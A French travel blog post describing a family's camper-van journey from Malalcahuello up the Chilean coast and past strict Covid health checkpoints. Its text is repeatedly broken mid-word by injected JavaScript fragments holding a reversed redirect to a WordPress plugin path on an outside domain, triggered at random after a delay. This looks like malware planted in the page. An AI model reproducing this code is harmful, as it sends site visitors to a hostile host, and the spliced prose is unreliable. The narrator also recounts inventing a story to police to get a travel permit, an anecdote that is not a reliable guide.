Nous reprenons la route le 10 aout. Une tempête de neige nous retient encore quelques heures dans la confortable maison où nous avons passé ces 4 derniers mois. Ces derniers jours ont été super intenses en émotions, les asados, repas, et apéros d’adieux se sont enchainés, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la famille est triste de quitter toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ces nouveaux amis mais aussi excitée par les nouvelles aventures qui nous attendent. Le chasse neige passe enfin, une dernière photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, on quitte Malalcahuello, ses beaux araucarias, ses montagnes et les amis, direction le Pacifique.
A Curacautin, on reçoit des petits signes et des sourires. On est rassurés. La dernière fois qu’on était venu ici en Camping Car, l’accueil était tellement differrent…
Dans la camion l’ambiance est calme mais heureuse. Tout le monde est content de reprendre la route et découvrir enfin de nouveaux paysages. Un barrage sanitaire nous empêche d’entrer dans Concepción, nous ne pourrons malheureusement pas aller voir Mimi, notre adorable ange gardien qu’on aimerait tant enfin rencontrer !! Mimi continue de prendre soin de nous à distance et nous met en relation avec Agustin qui se charge de nous trouver un coin safe pour passer cette première nuit.
La tempête de neige nous a mis en retard, on arrive de nuit à Copquecura, où Agustin nous attend et nous fait signe de le suivre. Aprés plusieurs Km il nous laisse devant la petite maison de Marie Sol et Javier qui nous accueillent comme des princes. A peine le temps de faire les présentations, alertés par les voisins, les carabineros arrivent et s’inquiètent de notre présence. Javier prend la discussion en main, et finalement nous avons l’autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torisation de rester quelques jours ici. En quelques minutes nous vivons un condensé de ce qui nous attend pour ce nouveaux départ : méfiance de certains, incroyable hospitalité pour d’autres.
La plage est à deux pas, hier la tempête de neige, aujourd’hui le soleil, les jeux dans l’eau (froide) et les courses dans les dunes, les p’tits loups sont super heureux.
Sol et Javier vivent très modestement dans une toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute petite maison. Petit déjeuner, gâteaux, poisson frit, ils sont au petit soin pour nous. C’est fou.
3 jours plus tard nous les quittoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons, boostés à fond par leur incroyable générosité. Niveau Covid, le pic est passé depuis 1 mois, les courbent continuent de descendre lentement, le Chili est sur un plan de déconfinement prudent et très graduel. Chaque commune se voit attribuer un niveau en fonction du nombre de cas. 1 = Quarantaine stricte, 5 = Liberté toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totale. Rapidement on apprend à se déplacer dans ce contexte : La paperasse, les choses à dire, ne pas dire, les carabineros, les fonctionnaires de la santé, les barrières sanitaires…
Sur la route quelques personnes nous font des signes et des sourires, ça fait du bien ! Nous sommes probablement les premiers toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristes qu’ils croisent depuis plus prés de 5 mois.
La route côtière est superbe, on prend le temps de découvrir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les petits port de pèche et on profite de la chaleur et du soleil. Ce voyage sera définitivement diffèrent, lent et hors des sentiers battus.
Après Pichilemu et ses surfers on quitte la cote pour enfin rejoindre Nico Poncet à Santiago. 5 mois après, rdv honoré !!!! On fête cela comme il se doit !!! Dans la chambre d’hôtel, couvre feu oblige… On rate malheureusement de peu Lucia et les jumeaux rentrés en France quelques semaines auparavant.
Dans la capitale l’ambiance est bizarre, peu de gens dans les rues, des interminables files d’attentes devant les banques et les hypermarchés. Nico nous organise une superbe visite de l’usine d’Airbus Helicopter. Merci encore Nico !!!
On quitte Santiago pour rejoindre une des trois dernières familles françaises voyageant encore en camping car au Chili. Mathilde, Nicolas et leurs deux enfants sont installés depuis quelques semaines à Maintencillo, sur une plage un peu plus au nord. Bloqués comme nous depuis des mois, ils attendent de vendre leur camion avant de partir vers le Brésil.
On passe trois jours avec eux, Clément est super content d’avoir des copains pour fêter son anniversaire. Encore une fois quelques petits cadeaux achetés en cachette à Santiago, suffisent largement à son bonheur.
Jusqu’à présent nous n’avons pas eu de problèmes pour passer toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les contrôles et barrières sanitaires. Tous comprennent qu’on se dirige vers le seul aéroport international du Chili ouvert. Maintenant que l’on s’éloigne de Santiago c’est diffèrent. L’excuse ne tient plus… A 100Km au nord de Maintencillo un contrôle sanitaire extrêmement stricte est présent. Impossible de le contoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourner toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les autres routes sont fermées. Tout le monde nous prévient : Sans justificatif de déplacement il est impossible de passer. Pour nous l’équation est simple : Si on ne passe pas ce contrôle, le voyage s’arrête ici, on devra retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourner en France.
Nous prenons rendez vous avec le chef de la police local dans l’espoir qu’il nous délivre un sauf conduit. Difficile de trouver une histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire crédible… Je lui raconte qu’il faut absolument qu’on aille dans le nord pour vendre notre camion. Notre acheteur est dans une ville en quarantaine, il ne peut pas se déplacer. On est coincé… Il m’explique que depuis peu, pour éviter les abus, le gouvernement a informatisé les demandes de sauf conduit. Il ne peut plus en rédiger. Avec son adjoint ils cherchent une solution. On parle de notre voyage, de ses enfants, de la France, etc… Finalement via la plateforme officielle, il décide de me donner un sauf conduit pour cause de déménagement. Officiellement nous allons donc vivre à Calama !!! Après une heure de discussion je sors du commissariat avec un papier signé et tamponné.
Le lendemain matin, confiants, on se dirige vers le contrôle. Sur place on a l’impression d’arriver à un poste frontière. Devant nous de nombreux véhicules sont contraints de faire demi-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour. Après une heure d’attente notre toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour arrive, je présente fièrement mon beau papier officiel, mais la fonctionnaire de la santé doute. On nous met sur le coté et après une autre heure d’attente la responsable vient nous annoncer que nous ne pouvons pas passer. On parle, on argumente, nous avons un papier officiel des Carabineros, on ne comprend pas ce qui bloque. Je fini par lui demander directement ce qu’elle veut pour nous laisser passer. « Si vous venez avec le même papier mais signé par un notaire c’est bon ».
C’est l’incompréhension et la déception. On ne voit pas bien pourquoi un notaire doit valider ce document et comment il accepterait de signer un papier équivalent. Et puis au Chili, les office notariales c’est un peu comme la préfecture de Marseille, des heures d’attentes…
Le notaire le plus proche est à 80 km. On décide d’aller y tenter notre chance. En arrivant, pas de surprise, pas moins d’une cinquantaine de personnes attendent leurs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tours. Pandémie oblige, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le monde est dans la rue. Je m’installe dans la queue, mon voisin m’explique qu’il est là depuis plus de deux heures… Je décide d’aller parler avec la personne qui gere les entrées dans l’office et lui explique mon cas. OK, entrez on va s’occuper de vous. Quelques minutes plus tard une dame me reçoit, je lui raconte mon histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire, lui montre mon beau papier officiel et lui fait les yeux les plus doux possible. Pas facile de montrer un sourire derrière un masque… Sans aucune vérification elle rédige une attestation de déménagement. Tout se passe super vite, le papier est validé et signé par le notaire et on me dirige vers la caisse pour récupérer mon sésame. Machinalement je sort la CB, ce papier est tellement important pour nous que je suis prêt à payer n’importe quel prix. En regardant la facture je ne peux m’empêcher de rigoler, 2000 Pesos soit 2,1€ !!! Finalement je vais payer en espèces !!
Tout ça n’a pris que 20 minutes, je n’en reviens pas. On se dépêche de retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourner au contrôle sanitaire et après une nouvelle heure d’attente nous présentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons le papier si important. C’est une autre fonctionnaire qui s’occupe de nous mais évidement elle nous a reconnu, des français en camping car c’est assez rare ! Elle regarde attentivement le document… « C’est parfait, bon voyage !!! » A peine la barrière refermée derrière nous on cri toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous comme des fous. On est tellement heureux, cette fois ci c’est sur, le voyage peut continuer.
A nous le Norte Grande et ses déserts !!!